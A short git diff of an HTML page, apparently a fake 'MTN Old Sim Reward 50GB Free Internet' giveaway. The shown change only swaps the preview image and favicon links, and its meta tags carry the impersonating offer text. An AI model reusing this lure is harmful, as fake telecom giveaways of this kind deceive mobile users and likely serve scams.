--- a/15GB.html
+++ b/15GB.html
@@ -43,8 +43,8 @@
     <meta content="https://i.imgur.com/mbBCcZ2.png" property="og:image">
      <meta property="og:title" content="🎊 MTN Old Sim Reward 50GB Free Internet!🎁">
     <meta content="To celebrate our Customers we give 50GB of free internet" property="og:description">
-    <link href="https://i.imgur.com/mbBCcZ2.png" rel="image_src">
-    <link href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBKNX2QXFHpg3NvgLXabhRFf3tXJIaShUciB8Ks5H6zLfg02JfC2UxTqgktRFY8ydxMMiKp2AH5LgAAW7V4eharURDRaqSdrxRM-JTtE12DcIc2lldegzs_Y6He_F5_5MrQwogsfuEPUoPDgOVriE9_qstPPZVu652Ce2NreHP4_FiJrwvKl04HMmYPs8/s625/WhatsApp%20Image%202024-08-19%20at%2023.07.56.jpeg" rel="icon" type="image/x-icon">
+    <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS7StAXaP6TlN3HKfXKGEEzDz-Zc0yGNNrtJw&usqp=CAU" rel="image_src">
+    <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS7StAXaP6TlN3HKfXKGEEzDz-Zc0yGNNrtJw&usqp=CAU" rel="icon" type="image/x-icon">
     <meta property="og:updated_time" content="1440432930"/>
     <!-- <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500&display=swap" rel="stylesheet">-->
     
